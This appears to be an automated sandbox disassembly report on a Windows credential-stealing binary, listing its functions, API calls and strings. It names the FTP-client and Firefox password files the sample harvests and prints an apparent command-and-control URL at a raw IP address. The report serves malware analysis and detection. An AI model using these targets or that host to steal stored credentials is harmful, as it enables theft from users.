SOFTWARE\Robo-FTP 3.7\Scripts, xrefs: 0040D105, 0040D14E
FTP File%d, xrefs: 0040D137

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
API String ID: 988369812-376751567
Opcode ID: 8cdd718ba8be59cf09248816c28fc2046a3b3dcf2c2ac50665ecf6a847215371
Instruction ID: 21daa89d25b12e3a4bbf04d863efc35a619988afc870b97fe70358e5ad2946eb
Opcode Fuzzy Hash: 8cdd718ba8be59cf09248816c28fc2046a3b3dcf2c2ac50665ecf6a847215371
Instruction Fuzzy Hash: C8012171D00109BADF11BAD0CC82EEE7A79AB00304F508577B410B51E1DBBD9B999669

Function 00401216 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401226
ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040124A
CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401256

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: a998e206f71e74847a2e32911413f759f32608bad605252caca5bd1b26f11fae
Instruction ID: aed9a798a82424e29e86fb4d6860d5487fec7a9f4572c56382ed939f2aa806a9
Opcode Fuzzy Hash: a998e206f71e74847a2e32911413f759f32608bad605252caca5bd1b26f11fae
Instruction Fuzzy Hash: 08F0F931A4010CBAEF22AB61DC02FDDBA79AB24749F1080A6B554F40E0D7B99BD99B14

Function 00401CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401D23

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401D58
*LA, xrefs: 00401D3C

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AllocFolderLocalPath
String ID: *LA$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 1254228173-354294624
Opcode ID: 7fec1d3e61f3feca6de6d161362341445026920e8f5d36ff699d061ec1d7d0a9
Instruction ID: 4cb5a2a24a71925c310593c43afaf503172ba59323d0c2f3b18a639a8d0b135b
Opcode Fuzzy Hash: 7fec1d3e61f3feca6de6d161362341445026920e8f5d36ff699d061ec1d7d0a9
Instruction Fuzzy Hash: 48017172A04605FBDB109FA0DC01F9AB7A5AF90754F208177E115BA2E0E778AB40DB99

Function 0040FAFC Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00403E3C: WSAStartup.WSOCK32(00000101,?), ref: 00403E51

Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FB9A

Strings

http://67.215.225.205:8080/forum/viewtopic.php, xrefs: 0040FB4A, 0040FB66
Client Hash, xrefs: 0040FBBD

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: SleepStartup
String ID: Client Hash$http://67.215.225.205:8080/forum/viewtopic.php
API String ID: 1372284471-2775902078
Opcode ID: a3269650c58c9da7f5beb3831232c0bf44e9a4ab19e285d2e0cb401876a42a6e
Instruction ID: 8b4c8722f9cea48706245652907ee635cf1d43610685aa9f03bd54f726094e1f
Opcode Fuzzy Hash: a3269650c58c9da7f5beb3831232c0bf44e9a4ab19e285d2e0cb401876a42a6e
Instruction Fuzzy Hash: 2721E03190024A9ADF31ABD1C955BFF76B8AB40349F64003BE240719D1D7BC6A8DDF6A

Function 00409EDC Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(011B4128,Odin), ref: 00409F2E

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

SiteInfo.QFP, xrefs: 00409F04, 00409F43
Odin, xrefs: 00409F28

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: Odin$SiteInfo.QFP
API String ID: 2826327444-4277389770
Opcode ID: 3364458b29281769122b882b30e5182c35c2af25c32701b4a890b84978b81900
Instruction ID: b721dd6199e606a7405d3023bbd8d78726059eb790ab865cdb695182bc14a4f7
Opcode Fuzzy Hash: 3364458b29281769122b882b30e5182c35c2af25c32701b4a890b84978b81900
Instruction Fuzzy Hash: 8F0192709041457AEB2137628C02FAE3E599F91354F24447BBA05F51E3DABC9E8197AC

Function 0040740C Relevance: 4.6, APIs: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040741F
RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407453
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074B6

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID:
API String ID: 4012628704-0
Opcode ID: 7cf45e06979cf2661d412ee5068b3bb22eeb6c37c9b81cf8d53f81917df225d8
Instruction ID: 155f66e0a3eb4ed45e6c31c6170a54985ca42cf8ad1f2557258d09283c9eb503
Opcode Fuzzy Hash: 7cf45e06979cf2661d412ee5068b3bb22eeb6c37c9b81cf8d53f81917df225d8
Instruction Fuzzy Hash: 4C111C3180010CBADF21AF90CC41BDEBBB9BF04304F1081B6B614B41A1DBB9AB959F99

Function 0040F1D7 Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F1EA
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F21E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F278

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: b2d30eb2bdb4853a3c84d6db42dd5d871784dca00c657ab78dc8cd12eb9f17d8
Instruction ID: 7aeed7f2fb9415a72b7facb0512b1517e4b34102ea468ddb99e87d09525f193d
Opcode Fuzzy Hash: b2d30eb2bdb4853a3c84d6db42dd5d871784dca00c657ab78dc8cd12eb9f17d8
Instruction Fuzzy Hash: F411303590020CBADF21AFA0CC42FED7BB9BF00304F1084BAB514740A1DBB99A95AF58

Function 00403641 Relevance: 4.6, APIs: 3, Instructions: 50networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00403650
connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036AC
closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036B7

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: closesocketconnectsocket
String ID:
API String ID: 643388700-0
Opcode ID: adbb6ac0b90987b23a3262b7a8cba8f3f0728d4c9bf546c130d88563fe805f45
Instruction ID: 0f4e70b3c385995e94c185cadd9b4dcc0b5eff5d6ab24c1b6e743b0ce68c8e52
Opcode Fuzzy Hash: adbb6ac0b90987b23a3262b7a8cba8f3f0728d4c9bf546c130d88563fe805f45
Instruction Fuzzy Hash: 63018870904208BADB309E65CC81BEE775DAB00329F108E3BB525A53D1D7BE96848E5A

Function 0040F138 Relevance: 4.5, APIs: 3, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F14B
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F17B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F1CE

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: 1e6cd5474725fc5df6579a1196cd532cd4464ffdccfbeb21048c464faf3b0f79
Instruction ID: ff92f93e4485b710124cf93b1b5f9baed602077e37f661a9b7d9a33083fb913e
Opcode Fuzzy Hash: 1e6cd5474725fc5df6579a1196cd532cd4464ffdccfbeb21048c464faf3b0f79
Instruction Fuzzy Hash: 81110C3190410CFADF21AF91CC42BED7BB9BF04304F1084B6B614B51A1DBB99A95AF99

Function 0040C99F Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040C9D6

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

EasyFTP, xrefs: 0040C9CE
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040C9B8

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
API String ID: 1884169789-2776585315
Opcode ID: 4b651430f1d431a53fd7f1d7f29a10b4bdb0120e32550dfdcc86950108ae2971
Instruction ID: 38cd4040eac23dbc5003c29778b8620063ef749b381af0bc32b7c6151f96b470
Opcode Fuzzy Hash: 4b651430f1d431a53fd7f1d7f29a10b4bdb0120e32550dfdcc86950108ae2971
Instruction Fuzzy Hash: 1CF03670A40208BAEF117B62CC47F9D7E659F00748F60417BB914B41F1DBB99F519A5C

Function 00403DD8 Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(00000000,?), ref: 00403DF4
GlobalLock.KERNEL32(?), ref: 00403E0B

Part of subcall function 00403C26: InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C99

GlobalUnlock.KERNEL32(?), ref: 00403E28

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Global$CrackFromInternetLockStreamUnlock
String ID:
API String ID: 1075796459-0
Opcode ID: ce55fd528eaf758c4a5372cfb4888708a2d2c61cd53c49750d7f58bce14e3a50
Instruction ID: 0fc2f376dfeef626b66e1d29bc1a390a64e8a5b62cb5dc3ba2aecaad03027e41
Opcode Fuzzy Hash: ce55fd528eaf758c4a5372cfb4888708a2d2c61cd53c49750d7f58bce14e3a50
Instruction Fuzzy Hash: 64F0493050010CBBDF01AFA5CC45AEE7F69EB04319F10863AB924A41F1D7B98FA0EB58

Function 00407CA3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407CC7

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

\32BitFtp.ini, xrefs: 00407CD7

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
String ID: \32BitFtp.ini
API String ID: 2776971706-1260517637
Opcode ID: 84e47ae72e4090bf6b37d5a2a60b7c4628951cfe3f0146c0d9a50f58c1a126cf
Instruction ID: bd2dbbae8e9f8974edebc8d7c7c3b56a6b553cfccc15916b2df4de00301a83f1
Opcode Fuzzy Hash: 84e47ae72e4090bf6b37d5a2a60b7c4628951cfe3f0146c0d9a50f58c1a126cf
Instruction Fuzzy Hash: 6AF08271A0020CBAEB20BB61CC42FDE7A299B40348F500437BA04F61E2DABDEB80565D

Function 0040231D Relevance: 3.0, APIs: 2, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00402326
GetProcAddress.KERNEL32(00000000,?), ref: 00402354

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: c565f1aa3f4fda05442a02a35214380c9171b068020167273cef74c294764032
Instruction ID: 1dfa1c1e5af10fc35452843b0631d1bd73dd53e789340300057ab7dd164a1ecb
Opcode Fuzzy Hash: c565f1aa3f4fda05442a02a35214380c9171b068020167273cef74c294764032
Instruction Fuzzy Hash: 64F0907320510926D7105539AD4899BAB88E7D3378B145137ED55E62C0E1BDDD81C2A4

Function 00401D7D Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401DA9
CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401DB6

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 29885c1d9da61ee7b7d59970356271c23f7b0ac0678618ded3fe9124e386af44
Instruction ID: 90587616b231e62f0ce0a1ca71656843b80ecc2effe649e52ec39507118c715a
Opcode Fuzzy Hash: 29885c1d9da61ee7b7d59970356271c23f7b0ac0678618ded3fe9124e386af44
Instruction Fuzzy Hash: 10E04F7235024437EB3115699C83F5A3AC85B11B58F104432B641BD2D1D5E9F9C1466C

Function 0040E391 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0040E3CE

Strings

.xml, xrefs: 0040E3DD

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .xml
API String ID: 1659193697-2937849440
Opcode ID: e661d0f5c6da48302626efe8c0d24da70cca5f3d29aa0d08996af125c8b87a97
Instruction ID: 654528fb6c6b9d08504cb05bd4ae52cf434344222dfee05949ef85a016581d04
Opcode Fuzzy Hash: e661d0f5c6da48302626efe8c0d24da70cca5f3d29aa0d08996af125c8b87a97
Instruction Fuzzy Hash: 84F03031800108FBDF11AF91CC42ECD7A76AB54318F208166F524B11E0C7799BA4EB48

Function 00401E00 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000), ref: 00401E0D

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

ExpandEnvironmentStringsA.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00401E28

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandLocalStrings$AllocFree
String ID:
API String ID: 2376306162-0
Opcode ID: 4eb245ddf13acbf0e75f31ade5cff1370375b6a9761235cdb6171c3728abaefc
Instruction ID: 24368c84768ad20674b47a6cedeb084af262bdde019d902b2cc9b9c42f429847
Opcode Fuzzy Hash: 4eb245ddf13acbf0e75f31ade5cff1370375b6a9761235cdb6171c3728abaefc
Instruction Fuzzy Hash: 91E01271A00109FBDF11AAB1CD02FAF7A69AB10388F2045367D14F51F1D7799F50A69C

Function 00403691 Relevance: 3.0, APIs: 2, Instructions: 16networkCOMMON

Download Yara Rule

APIs

connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036AC
closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 004036B7

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: closesocketconnect
String ID:
API String ID: 1323028321-0
Opcode ID: d6c968b658abe3d36e81043180a00b0d96a7d8992d9790436992e27dcae3281c
Instruction ID: be6505267f29f4178e4e45716bfd2a082c1c90b363e213ca25923fe40938077a
Opcode Fuzzy Hash: d6c968b658abe3d36e81043180a00b0d96a7d8992d9790436992e27dcae3281c
Instruction Fuzzy Hash: 78D0C9B1A0020879D710DABA5DC29FEA65DAB10328F105E3BB526E12C1E5BDC5845E29

Function 004036C5 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

send.WSOCK32(?,?,00000000,00000000), ref: 004036EC

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 6796e4a979f46f7e14b9463c85c033f8f1df5933707a7bbe8b597650c4fb955e
Instruction ID: be9ef6ce2d4025a438cc5a6b6f313f8180328372e462bd93b64e20afe6ef20d9
Opcode Fuzzy Hash: 6796e4a979f46f7e14b9463c85c033f8f1df5933707a7bbe8b597650c4fb955e
Instruction Fuzzy Hash: 88F0A072300248EBDB104E55DC40B5B3B58E791369F20443BFA01A73C1D3BAEA918758

Function 00403711 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 589277c18e245aacdd3829cde8053bbf312a351eb7740a65391bf8dbcda2696d
Instruction ID: e8c92696a27f7789f9168a37488be3243172b4df61387a138d61a6e4929c29f7
Opcode Fuzzy Hash: 589277c18e245aacdd3829cde8053bbf312a351eb7740a65391bf8dbcda2696d
Instruction Fuzzy Hash: C8F037B551011CAEDB209F14CC51BD9BB78EB14714F1081A1E558E61D0D7F59BC48F55

Function 00403BF8 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403C1D

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 31c99b0a74ce9338f0b04b6a28a6c6564a948aa46e863f54856cd2301dc91045
Instruction ID: 9de39b6423a18e4b635914f995573c2f828d2e73ec19ed757491c159e372b79a
Opcode Fuzzy Hash: 31c99b0a74ce9338f0b04b6a28a6c6564a948aa46e863f54856cd2301dc91045
Instruction Fuzzy Hash: 9AD0A77054020CB1D710D740CD03EDD72785F00708F108230B750BA1E1E7F55B88934D

Function 00403E3C Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00403E51

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: ffab5162380fe3af86914e81f9cfe18dae7339984c6a2ef45e840d9542290845
Instruction ID: 408fbaf15a75b0da35fbc24d3226a342d8ed0cf0f325acef7b37683ef5936850
Opcode Fuzzy Hash: ffab5162380fe3af86914e81f9cfe18dae7339984c6a2ef45e840d9542290845
Instruction Fuzzy Hash: 5FB0923161020836EA10E6958C439DA729D4744748F4001A13A59D12C2EEE5AAC04AEA

Function 0040100F Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00401016

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 421d0a860c6d9d165e723f529cb45f0477ca61d72d068e36a6a36305f6e12bb0
Instruction ID: b431a99ddbd6f298bdb6c6cbc4e5d632e74455fe4781730d40ac7f96afd32023
Opcode Fuzzy Hash: 421d0a860c6d9d165e723f529cb45f0477ca61d72d068e36a6a36305f6e12bb0
Instruction Fuzzy Hash: 37A0223238020030EE00EB808C83FCE28030B2CB8CF008022B3082C0C0C0FEC0E0C228

Function 004018A0 Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: c09eb3dfaaad0fcb77e880224629c9a10ca60c10ba5b4db41bc18a076b99674a
Instruction ID: 500c98066f7ad2306fab3d815ea7ca12909582ff6fddbe18178bd9c5c23c3a43
Opcode Fuzzy Hash: c09eb3dfaaad0fcb77e880224629c9a10ca60c10ba5b4db41bc18a076b99674a
Instruction Fuzzy Hash: 42C09B3210060C56DB116F25D949B9E79D4575034CF40C2376D05645B1D6B8D6D0C5D8

Function 004018B7 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: bfd43a2e21fc68efd9c566fc8633d8267606145764da389cb582ccf157877ab6
Instruction ID: 0df91a5887059c29a5536f2b37c104e83e237d577eaeef3e17dd13c7587ff9d4
Opcode Fuzzy Hash: bfd43a2e21fc68efd9c566fc8633d8267606145764da389cb582ccf157877ab6
Instruction Fuzzy Hash: 0FB092B124020827E250AA49C803F5A738C9B10B8CF408122BB44A6282C8A8F89042BD

Non-executed Functions

Function 0040966C Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004096DC
lstrcmpiA.KERNEL32(00414FF5,?), ref: 00409709
lstrcmpiA.KERNEL32(00414FF7,?), ref: 00409726
FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 004098BC
FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 004098CF

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

signons.txt, xrefs: 00409841
prefs.js, xrefs: 00409795
signons.sqlite, xrefs: 004097DB
signons3.txt, xrefs: 00409863
\*.*, xrefs: 0040969C
signons2.txt, xrefs: 00409852
*.*, xrefs: 004096AB

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 3040542784-1405255088
Opcode ID: 5779c8a750443792198fb027128011ff13c60aa6543853fd979e69c056137fa7
Instruction ID: 0876a1ce564651239c7d921400908ae003098a0742f9dfd6c590efa37419d23c
Opcode Fuzzy Hash: 5779c8a750443792198fb027128011ff13c60aa6543853fd979e69c056137fa7
Instruction Fuzzy Hash: BA517631951109AAEF21BF21CC42AEE7B65AF40348F10847BB408711F2DB7D8ED19E6D

Function 00402B2A Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

explorer.exe, xrefs: 00402BB0

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID:
String ID: explorer.exe
API String ID: 0-3187896405
Opcode ID: 60ed86e535dc6f4d37373210e17f1fc447725754a780f13e0bb98d9f5e9b3016
Instruction ID: 39a556bab7de2521a735243ee9caf64442084a5f1f6cbcaf95e7dd06fe242eca
